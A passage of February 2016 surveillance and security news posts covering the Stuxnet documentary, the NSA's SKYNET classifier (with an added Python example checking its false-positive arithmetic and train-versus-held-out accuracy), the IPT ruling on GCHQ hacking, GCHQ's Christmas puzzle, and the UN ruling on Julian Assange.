Zero Days presented at the Berlin Film Festival confirms that Stuxnet was developed under the Information warfare operation called “Olympic Games,” which is part of a wider programme dubbed “Nitro Zeus” that involves hundreds of US cyber security experts. The US was not alone, the Israeli Government has a primary role in the Nitro Zeus program.

The documentary confirms that the nation-state hackers behind Stuxnet spent significant effort attempting to conceal their operation; they also designed the threat to operate only against Iranian machines.

One of the most intriguing novelties proposed in the documentary is the involvement of GCHQ: the film claims that British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.

The experts at the NSA worked hard to cover their tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet, developed by the Israeli side, that went out of control and infected thousands of computers across more than 115 countries.

It is not clear is the GCHQ was informed about the Nitro Zeus program.


NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, named after the malevolent artificial intelligence in the Terminator movies, is a surveillance program run by the US National Security Agency (NSA) that uses cell phone metadata to track the GPS location and call activity of suspected terrorists, who may then be targeted by a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA staffer Edward Snowden suggests that many of those people killed based on metadata may have been innocent.
Last year, the leaked documents detailing the NSA's SKYNET programme published by The Intercept showed that NSA had used a machine learning algorithm on the cellular network metadata of 55 Million people in Pakistan to rate each citizen's likelihood of being a terrorist.
You need to know that the US drone bombing campaigns in Pakistan have been raging for years.
Elementary Errors in SKYNET
However, the spy agency made elementary errors in its machine-learning approach, which led to the generation of thousands of false leads, potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET has a false-positive rate of 0.008%, in some cases, and the NSA was using about 55 million people’s phone records for SKYNET.
But, Ars Technica points out that, even at this minute rate, many innocent people are possibly mislabeled. Some of the NSA's tests even saw higher error rates of 0.18%, which means mislabeling nearly 99,000 people out of the 55 Million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
The purpose SKYNET serves is not clear yet. Although SKYNET could be part of non-violent surveillance programs, like tracking and monitoring suspected terrorists, Ars suggests this technology could potentially be used to target drone strikes.
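As an added example (not from the article or from any of the analyses it quotes), the two checks the passage above turns on: how many false positives a quoted rate implies across 55 million records and what precision that leaves, and why Patrick Ball's objection to testing a model on its own training data matters. The 5,000 true positives, the perfect detection rate and the random metadata are constructed assumptions for illustration.

```python
# Added example, not code from the article. Checks a reviewer would run on a
# population-scale classifier like the one described above.
import random

POPULATION = 55_000_000   # phone records the article says SKYNET used
FPR_SLIDE = 0.00008       # 0.008% false-positive rate quoted on the leaked slide
FPR_TEST = 0.0018         # 0.18% seen in some of the NSA's own tests


def expected_false_positives(fpr, population):
    """Innocent people mislabelled if everyone in the population is scored."""
    return round(fpr * population)


def precision(fpr, tpr, positives, population):
    """Share of flagged people who are real positives (the base-rate problem).
    `positives` is an assumed count of true positives in the population."""
    tp = tpr * positives
    fp = fpr * (population - positives)
    return tp / (tp + fp)


def memorising_classifier(train):
    """A model that simply remembers its training set (label lookup by feature
    vector); unseen vectors get label 0. Stands in for any over-fit model."""
    table = {features: label for features, label in train}
    return lambda features: table.get(features, 0)


def accuracy(model, data):
    return sum(model(f) == y for f, y in data) / len(data)


def train_vs_heldout(n=1000, seed=1):
    """Constructed data with NO signal: six random 'metadata' digits per record
    and a coin-flip label. Returns (training accuracy, held-out accuracy)."""
    rng = random.Random(seed)
    ids = rng.sample(range(10 ** 6), 2 * n)          # distinct feature vectors
    data = [(tuple(int(d) for d in f"{i:06d}"), rng.randrange(2)) for i in ids]
    train, heldout = data[:n], data[n:]
    model = memorising_classifier(train)
    return accuracy(model, train), accuracy(model, heldout)


if __name__ == "__main__":
    for fpr in (FPR_SLIDE, FPR_TEST):
        # 5,000 true positives at a perfect 100% detection rate is a constructed,
        # deliberately generous assumption, not a figure from the article.
        print(f"FPR {fpr:.3%}: ~{expected_false_positives(fpr, POPULATION):,} "
              f"false positives; precision {precision(fpr, 1.0, 5_000, POPULATION):.1%}")
    tr, ho = train_vs_heldout()
    print(f"memorising model: training accuracy {tr:.0%}, held-out accuracy {ho:.0%}")
```

Even under the generous assumptions, fewer than one flagged person in twenty is a true positive at the 0.18% rate, and the memorising model scores 100% on the data it was fitted to while doing no better than a coin flip on records it has never seen.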
US Drone Strike Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan and killed somewhere between 2,500 and 4,000 people, the Bureau of Investigative Journalism reported.
The NSA has not yet commented on how the agency used SKYNET, and how the technology was trained.
But Does Killing people "Based on Metadata" actually make sense?
Maybe it is easy to say YES, it makes sense as it happened or is happening far away in a foreign land. But imagine if SKYNET gets turned on us.


The IPT ruled that GCHQ spies can legally hack any electronic devices
15.2.2016 BigBrothers

The British Intelligence Agency GCHQ has a license to hack computers and devices, the UK’s Investigatory Powers Tribunal (IPT) ruled.
This means that the UK Government is giving full power to its intelligence agency to spy on Britons as well as people living abroad.

The verdict was issued on Friday after Privacy International and seven ISPs launched a legal challenge against the conduct of GCHQ, whose hacking operations were revealed by documents leaked by NSA whistleblower Edward Snowden.

GCHQ is responsible for "persistent" illegal hacking of electronic devices and networks worldwide, the Investigatory Powers Tribunal (IPT) had been told.

The popular whistleblower Edward Snowden disclosed a collection of documents revealing the extent of surveillance programmes carried out by the Five Eyes alliance. Snowden revealed the existence of secret surveillance activities such as the Tempora operation and hacking platforms such as the Smurf suite.

GCHQ admitted for the first time that the government monitoring station in Cheltenham carries out "persistent" and "non-persistent" Computer Network Exploitation (CNE) against targets in the UK and abroad.
In 2013, the tribunal was told, 20% of GCHQ's intelligence reports contained information obtained through hacking operations.

The case was heard by the IPT, which deals with complaints against surveillance carried out by UK intelligence. The four-day hearing took place at the Rolls Building in central London.

“The [legal] regime governing CNE … remains disproportionate,” Ben Jaffey, counsel for Privacy International, told the tribunal. “Given the high potential level of intrusiveness, including over large numbers of innocent persons, there are inadequate safeguards and limitations.”

Jaffey highlighted that GCHQ's hacking alters the targeted systems, an activity the authorities do not consider legal.

“The use of computer network exploitation by GCHQ, now avowed, has obviously raised a number of serious questions, which we have done our best to resolve in this Judgment,” reads the lengthy ruling from the Investigatory Powers Tribunal (IPT).

“Plainly it again emphasises the requirement for a balance to be drawn between the urgent need of the Intelligence Agencies to safeguard the public and the protection of an individual’s privacy and/or freedom of expression.”

The court has investigated the legality of the methods used by British intelligence

The tribunal "investigates and determines complaints of unlawful use of covert techniques by public authorities infringing our right to privacy."

In some cases, the GCHQ installed malware on targeted systems and hacked mobile devices with its Smurf suite.

In November 2015, the technological abilities of the UK's National Crime Agency (NCA) were revealed for the first time in a collection of documents: the British law enforcement agency has "equipment interference" (EI) capabilities, which allow it to hack into mobile devices and computers.

Eric King, deputy director of Privacy International, who analyzed the documents, noticed that one section explicitly refers to UK law enforcement having the capability to conduct "equipment interference."

“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”

UK law enforcement already in hacking business according to IPBill. pic.twitter.com/SAGzw2w4Fh
— Eric King (@e3i5) 4 November 2015

The GCHQ hacking operations were conducted under a self-imposed code of conduct, and the IPT recognized these activities as legal, to the chagrin of privacy advocates.

“We are disappointed that the IPT has not upheld our complaint and we will be challenging its findings,” said Scarlet Kim, legal officer at Privacy International.

I wonder at this point what the repercussions of such a decision will be at the international level. This decision in fact authorizes any government to hack the systems of foreign states. We are in the far west.


How to Crack GCHQ Crypto Puzzle? — Here's the Solution
9.2.2016 BigBrothers
GCHQ has finally released the solution to its head-spinning Xmas Puzzle, after all participants failed to reach the final answer.
GCHQ had released the crypto puzzle, dubbed Xmas Puzzle, on 9th December in the form of a Christmas card that went viral online soon after its release.
Nearly 600,000 people took up the challenge since early December, but only 30,000 made it to the final stage.
The puzzle opened with a grid-shading Nonogram whose solution formed a QR code containing a hint to unlock the next level of challenges.
The Xmas Puzzle extended to various topics such as a web link maze, word and numeric puzzles, graph theory and other cipher dilemmas. Some of the questions also touched on entertaining topics like Lord of the Rings, ducks, chess, French, and semaphore.
Who Created Crypto ‘Xmas Puzzle’?
This brainstorming puzzle was created by a small team of GCHQ cryptographers under GCHQ director Robert Hannigan. The deadline given to solvers was January 31st.
Attempts to solve the puzzle created a buzz on various online forums such as Reddit, a healthy approach that let such puzzles be solved jointly.
The Xmas Puzzle helped participants broaden their crypto skills and improve their problem-solving methodologies.
David MacBryan, 41, from Edinburgh, Wim Hulpia, 40, from Lovendegem in Belgium and US-born Kelley Kirklin, 54, from London, came closest to the fiendish puzzle game.
These three participants have been considered winners by the GCHQ and will be rewarded with a GCHQ Paperweight and a copy of Bletchley Park codebreaker Alan Turing's biography, signed with a personal message from GCHQ Director.
Unable to Crack? Here’s the Solution
However, GCHQ announced that none of the participants had completely solved the Xmas Puzzle. Hence, it released the full answer.
"I thought I had solved it, but a news report came out a few days ago saying nobody had … so I went back and had another look and figured out what I missed, but I was too late at that point. But it seems that everyone else missed it as well, and I was joint closest," David MacBryan told the Guardian.
GCHQ said the Xmas puzzle was not a recruitment ploy, which was initially believed, but the agency said the winners were welcome to apply for jobs.
The solution to the puzzle, including explanations from the puzzle-setters, is now available for you, so you can now check how many you managed to work out.


United Nations Rules in Favor of WikiLeaks Founder Julian Assange
5.2.2016 BigBrothers
VICTORY!
As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.
However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.
Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.
But, Victory! The decision is in favor of Assange.
The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.
Julian Assange should be released immediately and allowed to leave the embassy as well as both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.
"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.
But, Will UK and Sweden Let Assange Leave the country?
Although the decision is in favor of Assange, there is a possibility that neither country's government will let Assange leave the country.
The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.
The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."
Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.
To make sure of this, the Met Police, meanwhile, said it will make "every effort" to arrest Assange should he leave the embassy.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, to avoid extradition to:
Sweden where he is facing sexual assault allegations, which he has always denied.
The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.
Assange's Lawyer: Sweden and UK should Respect UN’s Decision
Melinda Taylor, Assange's lawyer, says that if the UN group rules in Assange's favor, the Swedish and British governments should respect their international obligations and comply with the decision, thereby allowing him to leave freely.
"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek reporter.
If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.
Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, helping governments to release people.
Similar rulings from the UN panel have resulted in the release of:
Washington Post journalist Jason Rezaian, who was released in Iran last month.
Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.
Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges; however, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.


On Friday, the United Nations can decide that Assange is being illegally detained
3.2.2016 BigBrothers

On Friday the United Nations can decide that Assange is being illegally detained; in that case the UK and Sweden must immediately release him.
The United Nations will very soon reveal the results of its investigation into the case of Julian Assange, the WikiLeaks founder. WikiLeaks publishes secret information and classified media from anonymous sources. WikiLeaks has already published more than 10 million documents; Assange described the platform as "a giant library of the world's most persecuted documents."

The decision is set to be announced next Friday, 4 February, when the UN could order the release of Assange.
Julian Paul Assange is an Australian journalist who founded WikiLeaks in 2006; he is currently residing in the Ecuadorian embassy in London, having been granted political asylum in August 2012.
Many are unaware that Assange has a past as a hacker: in 1987, under the pseudonym Mendax, he hacked many organizations with two colleagues known as "Trax" and "Prime Suspect."

The list of victims is long and includes the Pentagon, the U.S. Navy, NASA, and Australia’s Overseas Telecommunications Commission; Citibank, Lockheed Martin, Motorola, Panasonic, and Xerox.

In 1996, he pleaded guilty to twenty-five charges and was ordered to pay reparations of A$2,100 and released on a good behavior bond.

Assange has been residing in the embassy since 2012 to avoid extradition: the journalist is facing sexual assault allegations in Sweden, while the United States wants him to answer accusations of cyber espionage for publishing classified US military and diplomatic documents.

In September 2014, Julian Assange filed a complaint against Sweden and the United Kingdom, which has been considered by the UN Working Group on Arbitrary Detention.

We have to sit and wait for the decision on Assange's case. If the group decides that the man is being illegally detained, the UN is expected to call on the UK and Sweden to release him.

“IF THE WGAD FINDS IN FAVOUR OF JULIAN ASSANGE — WHAT HAPPENS NEXT?

If the WGAD finds in Julian Assange’s favour, it will declare that Julian Assange is arbitrarily detained. In this case the UK and Sweden must immediately release and compensate him.”